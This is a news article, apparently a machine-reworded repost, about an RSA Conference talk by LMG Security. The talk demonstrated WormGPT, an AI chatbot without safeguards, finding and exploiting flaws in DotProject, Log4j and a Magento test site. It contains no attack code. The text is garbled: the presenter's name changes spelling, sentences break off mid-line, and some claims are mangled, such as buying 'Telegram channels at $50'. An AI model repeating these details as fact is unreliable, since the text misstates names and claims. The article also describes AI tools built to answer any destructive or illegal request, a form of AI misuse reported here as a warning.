Experts reveal how “evil AI’ is changing hacking forever at RSA Conference

Serving technology enthusiasts for over 25 Years. TechSpot is the place to go for tech advice and analysis.

Hot potato: New AI tools, designed without ethical safeguards, are empowering hackers to identify software vulnerabilities and exploit them faster than ever. Cybersecurity experts warn that traditional defences will be unable to keep up with the rapid evolution of “evil AI” platforms.

A packed room at Moscone Centre in San Francisco had gathered on a recent morning for what was billed at the annual RSA Conference as

A technical exploration
the role of artificial intelligence in modern hacking.

The session led by Sherri Daveoff and Matt Durrin from LMG Security promised more than just theory. It would offer a rare live demonstration of “evil AI” being used in action. This topic has quickly moved from cyberpunk fantasy to real-world concern.

Davidoff, LMG Security’s founder and CEO, set the stage with a sober reminder of the ever-present threat from software vulnerabilities. But it was Durrin, the firm’s Director of Training and Research, who quickly shifted the tone, reports Alaina Yee, senior editor at PCWorld.

He introduced the concept of “evil AI” – artificial intelligence tools designed without ethical guardrails, capable of identifying and exploiting software flaws before defenders can react.

“What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?” Durrin asked the audience, previewing the unsettling demonstrations to come.

The journey to acquire these rogue AIs such as GhostGPT or DevilGPT usually ended in frustration. Their persistence finally paid off when WormGPT was found – a tool that has been highlighted

In a post by Brian Krebs,
you can buy Telegram channels at $50.

Durrin explained that WormGPT was essentially ChatGPT stripped off its ethical constraints. It will answer all questions, no matter how destructive the request is or how illegal. The presenters stressed that the real threat is not the tool itself, but its capabilities.

LMG Security began by testing a version older of WormGPT using DotProject. This is an open-source platform for project management. The AI correctly identified an SQL vulnerability and suggested a basic exploit. However, it failed to produce any working attacks – probably because it couldn’t handle the entire codebase.

Then, a newer version of WormGPT (version 2.1) was tasked to analyze the infamous Log4j vulnerabilities. Davidoff noted that the AI had not only discovered the vulnerability, but also provided enough information to create an exploit.

WormGPT’s latest iteration was the real shock: It offered step-bystep instructions, complete code tailored to the testing server, and these instructions worked flawlessly.

In order to push the limits even further, the team simulated an e-commerce Magento platform that was vulnerable. WormGPT detected an exploit with two parts that was undetectable by other security tools such as SonarQube or even ChatGPT. During the live demo, the rogue AI provided a comprehensive hacking manual, unprompted and at alarming speeds.

As this session came to a close Davidoff reflected upon the rapid evolution of these malicious AIs. She said

“I’m a little nervous about where we will [be] with hacker tools in six months because you can clearly see the progress that has been made over the past year,” . Yee wrote that the audience’s uneasy quiet echoed this sentiment.

Image Credit:

PCWorld, LMG Security (19659020)


www.aiobserver.co

More from this stream

Recomended